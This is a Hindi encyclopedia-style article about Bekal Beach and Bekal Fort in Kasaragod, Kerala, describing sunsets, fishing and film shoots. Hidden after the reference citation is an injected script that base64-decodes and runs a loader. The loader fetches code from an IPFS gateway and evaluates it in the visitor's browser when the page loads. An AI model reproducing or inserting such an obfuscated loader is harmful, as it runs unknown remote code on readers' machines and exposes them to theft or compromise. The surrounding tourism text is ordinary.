बेकल तट

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
बेकल तट

बेकल तट (अंग्रेज़ी: Bekal Beach) भारतीय राज्य केरल के प्रसिद्ध पर्यटन स्थलों में से एक है। केरल का सबसे उत्तरी ज़िला कासरगोड अपने देवस्थानों, क़िलों, नदियों, पहाड़ियों और सुन्दर सागर तटों के लिए प्रसिद्ध है। बेकल का शानदार क़िला केरल के सबसे बड़े और अच्छी तरह संरक्षित क़िलों में से एक है। इसके साथ ही यहाँ का बेकल समुद्र तट भी बड़ी संख्या में सैलानियों को अपनी ओर आकर्षित करता है।

  • बेकल का समुद्र तट यहाँ के मुख्य आकर्षणों में से एक है। धूप में भीगी हुई रेत के साथ यह समुद्र तट बहुत सुंदर दिखाई देता है।
  • सैलानी यहाँ समुद्र तट पर एक खूबसूरत दिन बिता सकते हैं। बैकवाटर में चल सकते हैं, शांत पानी में तैर सकते है, एक लाइन में खड़े नारियल के पेड़ों के नीचे टहल सकते हैं, आसपास की छोटी पहाड़ियों पर चढ़ सकते हैं और समुद्र तट पर दिन का अंत कर सकते हैं।
  • बेकल में सूर्यास्त देखने योग्य होता है। ताड़ के वृक्षों पर डूबते हुए सूर्य के साथ शर्बती रंग का आकाश एक मंत्रमुग्ध कर देने वाला दृश्य उपस्थित करता है।
  • यहाँ का समुद्र तट मछली पकड़ने के लिए विख्यात है।[1]
  • पर्यटक समुद्र तट पर स्थित प्रख्यात बेकल किले को भी देख सकते हैं, जहाँ फिल्मों की शूटिंग की जाती है। यदि आप भाग्यशाली हैं तो किसी फ़िल्मी सितारे की एक झलक भी पा सकते हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. बेकल बीच, बेकल (हिंदी) nativeplanet.com। अभिगमन तिथि: 26 जून, 2021।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख